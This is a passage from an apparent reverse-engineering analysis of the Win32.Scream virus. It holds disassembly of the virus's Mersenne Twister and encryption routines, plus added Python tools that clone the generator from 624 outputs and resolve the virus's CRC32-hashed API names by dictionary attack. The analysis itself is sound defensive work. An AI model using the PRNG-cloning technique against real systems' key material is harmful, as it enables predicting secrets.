32 CODE:00401B7B push 12BD6AAh CODE:00401B80 call init_genrand CODE:00401B80 CODE:00401B85 CODE:00401B85 CODE:00401B85 mov eax, [edi+edx*4-4] CODE:00401B89 mov ebx, eax CODE:00401B8B shr eax, 1Eh CODE:00401B8E xor eax, ebx CODE:00401B90 imul eax, 19660Dh CODE:00401B96 xor eax, [edi+edx*4] CODE:00401B99 mov ebx, [esp+24h+var_24] CODE:00401B9C add eax, ebx CODE:00401B9E add eax, [esi+ebx*4] CODE:00401BA1 mov [edi+edx*4], eax CODE:00401BA4 inc edx CODE:00401BA5 inc [esp+24h+var_24] CODE:00401BA8 cmp edx, 270h CODE:00401BAE jl short CODE:00401BAE CODE:00401BB0 mov eax, [edi+edx*4-4] CODE:00401BB4 mov [edi], eax CODE:00401BB6 xor edx, edx CODE:00401BB8 inc edx CODE:00401BB8 CODE:00401BB9 CODE:00401BB9 CODE:00401BB9 mov ebx, [esp+24h+var_24] CODE:00401BBC cmp ebx, [esp+24h+arg_4] CODE:00401BC0 jl short CODE:00401BC0 CODE:00401BC2 and [esp+24h+var_24], 0 CODE:00401BC2 CODE:00401BC6 CODE:00401BC6 CODE:00401BC6 CODE:00401BC8 mov ecx, 26Fh CODE:00401BC8 CODE:00401BCD CODE:00401BCD mov eax, [edi+edx*4-4] CODE:00401BD1 mov ebx, eax CODE:00401BD3 shr eax, 1Eh CODE:00401BD6 xor eax, ebx CODE:00401BD8 imul eax, 5D588B65h CODE:00401BDE xor eax, [edi+edx*4] CODE:00401BE1 sub eax, edx CODE:00401BE3 mov [edi+edx*4], eax CODE:00401BE6 inc edx CODE:00401BE7 mov eax, 270h CODE:00401BEC cmp edx, eax CODE:00401BEE jl CODE:00401BEE CODE:00401BF0 mov eax, [edi+eax*4-4] CODE:00401BF4 mov [edi], eax CODE:00401BF6 xor edx, edx

33 CODE:00401BF8 inc edx CODE:00401BF8 CODE:00401BF9 CODE:00401BF9 CODE:00401BF9 loop CODE:00401BF9 CODE:00401BFB mov dword ptr [edi], h CODE:00401C01 pop eax CODE:00401C02 popa CODE:00401C03 retn 8 CODE:00401C03 CODE:00401C03 init_by_array endp The previous code block initializes an array with an array of 32 bit seeds. CODE:00401C06 genrand_int32 proc near CODE:00401C06 CODE:00401C06 lea edi, [ebp+304h] CODE:00401C0C lea esi, mag01 CODE:00401C12 mov edx, [ebp+300h] CODE:00401C18 cmp edx, 270h CODE:00401C1E jl CODE:00401C1E CODE:00401C20 xor ecx, ecx CODE:00401C20 CODE:00401C22 CODE:00401C22 cmp ecx, 0E3h CODE:00401C28 jz CODE:00401C28 CODE:00401C2A call proc00401cb4 CODE:00401C2A CODE:00401C2F xor eax, [edi+ecx*4+634h] CODE:00401C36 mov [edi+ecx*4], eax CODE:00401C39 inc ecx CODE:00401C3A jmp CODE:00401C3A CODE:00401C3C CODE:00401C3C CODE:00401C3C CODE:00401C3C cmp ecx, 26Fh CODE:00401C42 jz CODE:00401C42 CODE:00401C44 call proc00401cb4 CODE:00401C44 CODE:00401C49 xor eax, [edi+ecx*4-38ch] CODE:00401C50 mov [edi+ecx*4], eax CODE:00401C53 inc ecx CODE:00401C54 jmp CODE:00401C54 CODE:00401C56 CODE:00401C56 CODE:00401C56 mov eax, [edi]

34 CODE:00401C58 and eax, 7FFFFFFFh CODE:00401C5D mov ebx, [edi+9bch] CODE:00401C63 call sub_401cc0 CODE:00401C63 CODE:00401C68 xor eax, [edi+630h] CODE:00401C6E mov [edi+9bch], eax CODE:00401C74 and dword ptr [ebp+300h], 0 CODE:00401C74 CODE:00401C7B CODE:00401C7B mov ecx, [ebp+300h] CODE:00401C81 mov ebx, [edi+ecx*4] CODE:00401C84 inc dword ptr [ebp+300h] CODE:00401C8A mov edx, ebx CODE:00401C8C shr edx, 0Bh CODE:00401C8F xor ebx, edx CODE:00401C91 mov edx, ebx CODE:00401C93 shl edx, 7 CODE:00401C96 and edx, 9D2C5680h CODE:00401C9C xor ebx, edx CODE:00401C9E mov edx, ebx CODE:00401CA0 shl edx, 0Fh CODE:00401CA3 and edx, 0EFC60000h CODE:00401CA9 xor ebx, edx CODE:00401CAB mov edx, ebx CODE:00401CAD shr edx, 12h CODE:00401CB0 xor ebx, edx CODE:00401CB2 xchg eax, ebx CODE:00401CB3 retn CODE:00401CB3 CODE:00401CB3 genrand_int32 endp The previous code block generates a random number in the interval [0, 0ffffffffh]. CODE:00401D5B RDKE32Encrypt proc near CODE:00401D5B CODE:00401D5B arg_0 = dword ptr 4 CODE:00401D5B arg_4 = dword ptr 8 CODE:00401D5B arg_8 = dword ptr 0Ch CODE:00401D5B arg_c = dword ptr 10h CODE:00401D5B CODE:00401D5B pusha CODE:00401D5C mov edi, [esp+20h+arg_0] CODE:00401D60 mov ebx, [esp+20h+arg_4] CODE:00401D64 mov ecx, [esp+20h+arg_8] CODE:00401D68 mov eax, [esp+20h+arg_c] CODE:00401D6C push ebx CODE:00401D6D push ecx CODE:00401D6E push edi CODE:00401D6F call SHA1 CODE:00401D6F CODE:00401D74 call RandomNumber CODE:00401D74 CODE:00401D79 inc eax CODE:00401D7A xchg eax, edx
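The three MT routines above, re-implemented so their behaviour can be checked and, more usefully, inverted. This is an added example written for this analysis, not code from the virus: the constants are those read off the listings (they are the MT19937 reference constants), and it assumes that the unlisted helpers proc00401cb4 and sub_401cc0 perform the standard twist with mag01 = {0, 9908B0DFh}. The seed values used in the demonstration are constructed. It goes one step beyond the listing by adding the untempering step, which is what makes RDKE32's "random" key material predictable from 624 observed outputs.

```python
"""MT19937 as laid out in Win32.Scream's init_genrand / init_by_array /
genrand_int32, plus the inverse of the tempering step.

Added example for this analysis; none of it is the virus's code. Assumption:
the unlisted helpers proc00401cb4 / sub_401cc0 perform the standard twist of
(mt[kk] upper bit, mt[kk+1] lower bits) with mag01 = {0, 9908B0DFh}.
"""
import random

N, M = 624, 397                      # 270h state words; 634h / 4 = 397
MATRIX_A = 0x9908B0DF                # mag01[1] in the reference implementation
UPPER, LOWER, MASK32 = 0x80000000, 0x7FFFFFFF, 0xFFFFFFFF


def temper(y):
    """The output transform at 00401C8A..00401CB0."""
    y ^= y >> 11
    y ^= (y << 7) & 0x9D2C5680
    y ^= (y << 15) & 0xEFC60000
    y ^= y >> 18
    return y & MASK32


def untemper(y):
    """Invert temper(): each step is a masked xorshift and can be undone."""
    y ^= y >> 18                         # shift >= 16: one round is exact
    y ^= (y << 15) & 0xEFC60000          # mask bits 15 and 16 are clear: one round
    x = y
    for _ in range(5):                   # 7-bit left shift: 5 rounds cover 32 bits
        x = y ^ ((x << 7) & 0x9D2C5680)
    y = x
    for _ in range(3):                   # 11-bit right shift: 3 rounds cover 32 bits
        x = y ^ (x >> 11)
    return x & MASK32


class MT19937:
    def __init__(self, seed=5489):       # 5489 is just the customary default seed
        self.mt = [0] * N
        self.mti = N
        self.init_genrand(seed)

    def init_genrand(self, s):
        """00401B2A: mt[i] = 6C078965h * (mt[i-1] ^ mt[i-1] >> 30) + i; mti = 270h."""
        self.mt[0] = s & MASK32
        for i in range(1, N):
            p = self.mt[i - 1]
            self.mt[i] = (0x6C078965 * (p ^ (p >> 30)) + i) & MASK32
        self.mti = N

    def init_by_array(self, key):
        """00401B5D: seed with 12BD6AAh, mix key with 19660Dh, then 5D588B65h."""
        self.init_genrand(0x12BD6AA)
        i, j = 1, 0
        for _ in range(max(N, len(key))):
            p = self.mt[i - 1]
            self.mt[i] = ((self.mt[i] ^ ((p ^ (p >> 30)) * 0x19660D)) + key[j] + j) & MASK32
            i, j = i + 1, j + 1
            if i >= N:
                self.mt[0], i = self.mt[N - 1], 1
            if j >= len(key):
                j = 0
        for _ in range(N - 1):
            p = self.mt[i - 1]
            self.mt[i] = ((self.mt[i] ^ ((p ^ (p >> 30)) * 0x5D588B65)) - i) & MASK32
            i += 1
            if i >= N:
                self.mt[0], i = self.mt[N - 1], 1
        self.mt[0] = UPPER                # the store at 00401BFB

    def _regenerate(self):
        """00401C20..00401C6E: mt[kk] = mt[kk+M] ^ twist(mt[kk], mt[kk+1])."""
        for kk in range(N):
            y = (self.mt[kk] & UPPER) | (self.mt[(kk + 1) % N] & LOWER)
            self.mt[kk] = self.mt[(kk + M) % N] ^ (y >> 1) ^ (MATRIX_A if y & 1 else 0)
        self.mti = 0

    def genrand_int32(self):
        if self.mti >= N:
            self._regenerate()
        y = self.mt[self.mti]
        self.mti += 1
        return temper(y)


def clone_from_outputs(outputs):
    """Rebuild a generator from 624 consecutive outputs that begin at a
    regeneration boundary (true for the first 624 draws after seeding)."""
    if len(outputs) != N:
        raise ValueError("need exactly 624 consecutive outputs")
    clone = MT19937()
    clone.mt = [untemper(o) for o in outputs]
    clone.mti = N                         # next draw regenerates, as the original will
    return clone


def matches_cpython(key, draws=8):
    """CPython seeds its MT19937 with init_by_array over the little-endian 32-bit
    words of an int seed, so it is an independent reference for this code."""
    g = MT19937()
    g.init_by_array(key)
    ref = random.Random(sum(k << (32 * i) for i, k in enumerate(key)))
    return [g.genrand_int32() for _ in range(draws)] == [ref.getrandbits(32) for _ in range(draws)]


if __name__ == "__main__":
    src = MT19937(0xC0FFEE)               # constructed seed for the demo
    seen = [src.genrand_int32() for _ in range(N)]
    clone = clone_from_outputs(seen)
    print("predicted:", clone.genrand_int32(), "actual:", src.genrand_int32())
```

The clone works because tempering is a bijection on 32-bit words and the state update never mixes in fresh entropy; nothing about the virus's seeding has to be known. In practice the 624 observed values must also start at a regeneration boundary, or the window has to be slid until the prediction matches.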

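GetCRC32OfString and the checksum-list walk in DirectoryTraversal above both rely on the same idea: the virus never stores a readable API or file name, only the CRC32 of its upper-cased form. The analyst's counterpart is a dictionary attack on those hash lists. The following is an added example written for this analysis, not the virus's code. It assumes a textbook CRC-32 (reflected, polynomial EDB88320h, initial value and final XOR FFFFFFFFh); because only the table builder and the tail of GetCRC32OfString appear on the page, the variant must be confirmed against the sample before real hash lists are fed in, which is why the hash function is a parameter. The candidate dictionary and the "extracted" hash list below are constructed for the demonstration.

```python
"""Dictionary attack on CRC32 name lists of the kind Win32.Scream keeps
(CRC32_Imported_*_API_Names, CRC32_Checksumfile_List).

Added example for this analysis; not the virus's code. Assumption: textbook
CRC-32 (reflected, poly EDB88320h, init/xorout FFFFFFFFh). Verify the variant
against the sample first; pass a different hash_fn if it differs.
"""
import zlib


def make_crc32_table(poly=0xEDB88320):
    """256-entry table of the kind FRC_MakeCRC32Table builds at start-up."""
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ poly if c & 1 else c >> 1
        table.append(c)
    return table


CRC_TABLE = make_crc32_table()


def crc32_str(s, table=CRC_TABLE):
    """Table-driven CRC-32 of an ASCII string (the NUL terminator is not hashed)."""
    crc = 0xFFFFFFFF
    for b in s.encode("ascii"):
        crc = table[(crc ^ b) & 0xFF] ^ (crc >> 8)
    return crc ^ 0xFFFFFFFF


def matches_zlib(s):
    """Sanity check of the table implementation against zlib's CRC-32."""
    return crc32_str(s) == zlib.crc32(s.encode("ascii"))


def build_lookup(candidates, hash_fn=crc32_str):
    """hash -> [names]; names are upper-cased first, as Uppercase does in the virus."""
    lookup = {}
    for name in candidates:
        lookup.setdefault(hash_fn(name.upper()), []).append(name)
    return lookup


def resolve_hashes(hash_list, lookup):
    """Map each hash taken from the sample to its candidate names ([] if unknown)."""
    return {h: lookup.get(h, []) for h in hash_list}


# Constructed dictionary. For the API tables one would feed the export lists of
# kernel32/imagehlp/sfc/winmm; for the file list, filenames a virus tends to avoid.
CANDIDATES = [
    "CreateFileA", "FindFirstFileA", "FindNextFileA", "FindClose",
    "SetCurrentDirectoryA", "SetFileAttributesA", "DeleteFileA",
    "ImageDirectoryEntryToData", "SfcIsFileProtected", "timeGetTime",
    "scanner.exe", "monitor.exe", "update.dat",
]

# Constructed stand-in for a list copied out of the sample: zero-terminated,
# like the one DirectoryTraversal walks with lodsd/jecxz.
SAMPLE_HASH_LIST = [crc32_str("SETFILEATTRIBUTESA"), crc32_str("DELETEFILEA"),
                    crc32_str("SCANNER.EXE"), 0x12345678, 0]


def resolve_sample(hash_list=SAMPLE_HASH_LIST, candidates=CANDIDATES):
    """Walk a zero-terminated hash list the way the virus does and name what it can."""
    lookup = build_lookup(candidates)
    hashes = []
    for h in hash_list:                   # jecxz: a zero entry ends the list
        if h == 0:
            break
        hashes.append(h)
    return resolve_hashes(hashes, lookup)


if __name__ == "__main__":
    for h, names in resolve_sample().items():
        print(f"{h:08X} -> {names or '?'}")
```

Unresolved entries are expected: the dictionary only ever contains the names one thought to try, so an unknown hash in an API table usually means a missing export list rather than an exotic function, and a collision between two candidates shows up as a list with more than one name.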

More information

Harnessing Intelligence from Malware Repositories

Harnessing Intelligence from Malware Repositories Harnessing Intelligence from Malware Repositories Arun Lakhotia and Vivek Notani Software Research Lab University of Louisiana at Lafayette arun@louisiana.edu, vxn4849@louisiana.edu 7/22/2015 (C) 2015

More information

Stitching the Gadgets On the Ineffectiveness of Coarse-Grained Control-Flow Integrity Protection

Stitching the Gadgets On the Ineffectiveness of Coarse-Grained Control-Flow Integrity Protection USENIX Security Symposium 2014, San Diego, CA, USA Stitching the Gadgets On the Ineffectiveness of Coarse-Grained Control-Flow Integrity Protection Lucas Davi Intel Collaborative Research Institute for

More information

Phoenix Technologies Ltd.

Phoenix Technologies Ltd. PC Division Desktop Product Line Subject: Standard BIOS 32-bit Service Directory Proposal Revision: 0.4 Revision Date: June 22, 1993 Document ID: Author: ATBIOS Thomas C. Block Origin Date: May 24, 1993

More information

Test Driven Development in Assembler a little story about growing software from nothing

Test Driven Development in Assembler a little story about growing software from nothing Test Driven Development in Assembler a little story about growing software from nothing Olve Maudal During the last decade Test-Driven Development has become an established practice for developing software

More information

Instruction Set Architecture

Instruction Set Architecture CS:APP Chapter 4 Computer Architecture Instruction Set Architecture Randal E. Bryant adapted by Jason Fritts http://csapp.cs.cmu.edu CS:APP2e Hardware Architecture - using Y86 ISA For learning aspects

More information

An Analysis of the Excel 2007 65535 Bug

An Analysis of the Excel 2007 65535 Bug An Analysis of the Excel 2007 65535 Bug Chris Lomont, www.lomont.org, Nov 2007, Version 1.2 1 Overview On September 22, 2007, a serious Excel 2007 bug was reported on a newsgroup [7] and was soon featured

More information

Embedded x86 Programming: Protected Mode

Embedded x86 Programming: Protected Mode by JEAN GAREAU Embedded x86 Programming: Protected Mode The x86 architecture is ubiquitous on the desktop and is spilling over into embedded systems environments. This article begins a series designed

More information

Violating Database - Enforced Security Mechanisms

Violating Database - Enforced Security Mechanisms Violating Database - Enforced Security Mechanisms Runtime Patching Exploits in SQL Server 2000: a case study Chris Anley [chris@ngssoftware.com] 18/06/2002 An NGSSoftware Insight Security Research (NISR)

More information

White paper: August 2008. Marcin Icewall Noga martin@hispasec.com

White paper: August 2008. Marcin Icewall Noga martin@hispasec.com White paper: GetCodec Multimedia Trojan Analysis August 2008 Marcin Icewall Noga martin@hispasec.com 1. Introduction Recently a new trojan was spotted spreading in the wild, infecting multi-media files

More information

Anti-RE Techniques in DRM Code

Anti-RE Techniques in DRM Code Anti-RE Techniques in DRM Code Jan Newger Seminar Advanced Exploitation Techniques RWTH Aachen, Germany jan.newger@rwth-aachen.de ABSTRACT In order to prevent music from being copied among consumers, content

More information

Diving into a Silverlight Exploit and Shellcode - Analysis and Techniques

Diving into a Silverlight Exploit and Shellcode - Analysis and Techniques Diving into a Silverlight Exploit and Shellcode - Analysis and Techniques By Omri Herscovici & Liran Englender January 04, 2015 Preface In recent years, exploit-kits are one of the most common platforms

More information

Syscall Proxying - Simulating remote execution Maximiliano Caceres <maximiliano.caceres@corest.com> Copyright 2002 CORE SECURITY TECHNOLOGIES

Syscall Proxying - Simulating remote execution Maximiliano Caceres <maximiliano.caceres@corest.com> Copyright 2002 CORE SECURITY TECHNOLOGIES Syscall Proxying - Simulating remote execution Maximiliano Caceres Copyright 2002 CORE SECURITY TECHNOLOGIES Table of Contents Abstract.........................................................................................

More information

Identification and Removal of

Identification and Removal of RIVERSIDE RESEARCH INSTITUTE Deobfuscator: An Automated Approach to the Identification and Removal of Code Obfuscation Ei Eric Laspe, Reverse Engineer Jason Raber, Lead Reverse Engineer Overview The Problem:

More information

BCD (ASCII) Arithmetic. Where and Why is BCD used? Packed BCD, ASCII, Unpacked BCD. BCD Adjustment Instructions AAA. Example

BCD (ASCII) Arithmetic. Where and Why is BCD used? Packed BCD, ASCII, Unpacked BCD. BCD Adjustment Instructions AAA. Example BCD (ASCII) Arithmetic We will first look at unpacked BCD which means strings that look like '4567'. Bytes then look like 34h 35h 36h 37h OR: 04h 05h 06h 07h x86 processors also have instructions for packed

More information

PCI BIOS SPECIFICATION. Revision 2.1

PCI BIOS SPECIFICATION. Revision 2.1 PCI BIOS SPECIFICATION Revision 2.1 August 26, 1994 ii PCI BIOS Specification Revision 2.1 REVISION REVISION HISTORY DATE 1.0 Original issue distributed by Intel 9/28/92 2.0 Updated to be in synch with

More information

MACHINE ARCHITECTURE & LANGUAGE

MACHINE ARCHITECTURE & LANGUAGE in the name of God the compassionate, the merciful notes on MACHINE ARCHITECTURE & LANGUAGE compiled by Jumong Chap. 9 Microprocessor Fundamentals A system designer should consider a microprocessor-based

More information

CS:APP Chapter 4 Computer Architecture Instruction Set Architecture. CS:APP2e

CS:APP Chapter 4 Computer Architecture Instruction Set Architecture. CS:APP2e CS:APP Chapter 4 Computer Architecture Instruction Set Architecture CS:APP2e Instruction Set Architecture Assembly Language View Processor state Registers, memory, Instructions addl, pushl, ret, How instructions

More information

Analysis and Diversion of Duqu s Driver

Analysis and Diversion of Duqu s Driver Analysis and Diversion of Duqu s Driver Guillaume Bonfante, Jean-Yves Marion, Fabrice Sabatier, Aurélien Thierry To cite this version: Guillaume Bonfante, Jean-Yves Marion, Fabrice Sabatier, Aurélien Thierry.

More information

Using MMX Instructions to Convert RGB To YUV Color Conversion

Using MMX Instructions to Convert RGB To YUV Color Conversion Using MMX Instructions to Convert RGB To YUV Color Conversion Information for Developers and ISVs From Intel Developer Services www.intel.com/ids Information in this document is provided in connection

More information

Attacking x86 Windows Binaries by Jump Oriented Programming

Attacking x86 Windows Binaries by Jump Oriented Programming Attacking x86 Windows Binaries by Jump Oriented Programming L. Erdődi * * Faculty of John von Neumann, Óbuda University, Budapest, Hungary erdodi.laszlo@nik.uni-obuda.hu Abstract Jump oriented programming

More information

Static detection of C++ vtable escape vulnerabilities in binary code

Static detection of C++ vtable escape vulnerabilities in binary code Static detection of C++ vtable escape vulnerabilities in binary code David Dewey Jonathon Giffin School of Computer Science, Georgia Institute of Technology {ddewey, giffin}@gatech.edu Abstract Static

More information

Hacking the Preboot execution Environment

Hacking the Preboot execution Environment Hacking the Preboot execution Environment Using the BIOS network stack for other purposes Julien Vanegue jfv@cesar.org.br CESAR Recife Center for Advanced Studies and Systems, Brasil. September 27, 2008

More information

Egil Aspevik Martinsen Polymorphic Viruses. Material from Master Thesis «Detection of Junk Instructions in Malicious Software»

Egil Aspevik Martinsen Polymorphic Viruses. Material from Master Thesis «Detection of Junk Instructions in Malicious Software» Egil Aspevik Martinsen Polymorphic Viruses Material from Master Thesis «Detection of Junk Instructions in Malicious Software» 1 History 1982 Elk Cloner Brain 1987 1260 1992 Ply 1997 Melissa ILOVEYOU Zmist

More information

For a 64-bit system. I - Presentation Of The Shellcode

For a 64-bit system. I - Presentation Of The Shellcode #How To Create Your Own Shellcode On Arch Linux? #Author : N3td3v!l #Contact-mail : 4nonymouse@usa.com #Website : Nopotm.ir #Spcial tnx to : C0nn3ct0r And All Honest Hackerz and Security Managers I - Presentation

More information